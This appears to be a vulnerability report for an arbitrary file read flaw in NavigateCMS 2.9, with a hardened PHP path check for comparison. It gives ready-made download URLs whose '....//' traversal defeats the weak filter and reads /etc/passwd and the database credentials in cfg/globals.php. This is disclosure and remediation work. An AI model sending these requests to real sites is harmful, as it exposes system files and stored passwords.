exp
After login, we can see our sid in the cookies.
For example, my sid is 161099c65675803ecc8de95ae08d3e12.
Then you can get an arbitrary file by:
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php
You can get some sensitive information such as the MySQL user/password.
analysis
location: navigate_download.php
and in navigate\lib\core\core.php
we can rewrite it to bypass this filter.
suggest
you can use replace('../', "hacker") rather than replace('../', "")
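As an added example (not NavigateCMS code), the single-pass replacement described in the report next to a containment check that resolves the path with realpath() and requires it to stay under the download directory; the function names and the temporary directory are assumptions for the demonstration.

```php
<?php
// Weak: a single pass of str_replace() over the input. Removing one "../" from
// "....//" leaves "../" behind, so the filter rebuilds the very sequence it removes.
function weak_filter(string $id): string
{
    return str_replace('../', '', $id);
}

// Hardened: do not sanitize the string; resolve the candidate and check containment.
// Returns the resolved path, or null when the file is missing or escapes $baseDir.
function resolve_inside(string $baseDir, string $id): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // Only plain file names are accepted here; NUL bytes are rejected before
    // the filesystem is consulted (realpath() would throw on them in PHP 8).
    if ($id === '' || $id !== basename($id) || strpos($id, "\0") !== false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $id);
    if ($candidate === false) {
        return null;
    }
    // Compare with the trailing separator so "/srv/files" cannot match "/srv/files2".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Demonstration on a temporary directory constructed for this example.
$dir = sys_get_temp_dir() . '/nav_example_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents($dir . '/report.pdf', 'sample');

var_dump(weak_filter('....//....//cfg/globals.php'));        // traversal survives the filter
var_dump(resolve_inside($dir, 'report.pdf'));                 // legitimate file resolves
var_dump(resolve_inside($dir, '....//....//cfg/globals.php')); // rejected
var_dump(resolve_inside($dir, '../../etc/passwd'));           // rejected

unlink($dir . '/report.pdf');
rmdir($dir);
```

If download ids legitimately include subdirectories, drop the basename() condition and rely on the realpath() prefix check alone, which still rejects any path that resolves outside $baseDir.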
bkfish changed the title from "arbitrary file read vulnerability" to "arbitrary file read vulnerability in NavigateCMS 2.9" on Nov 25, 2021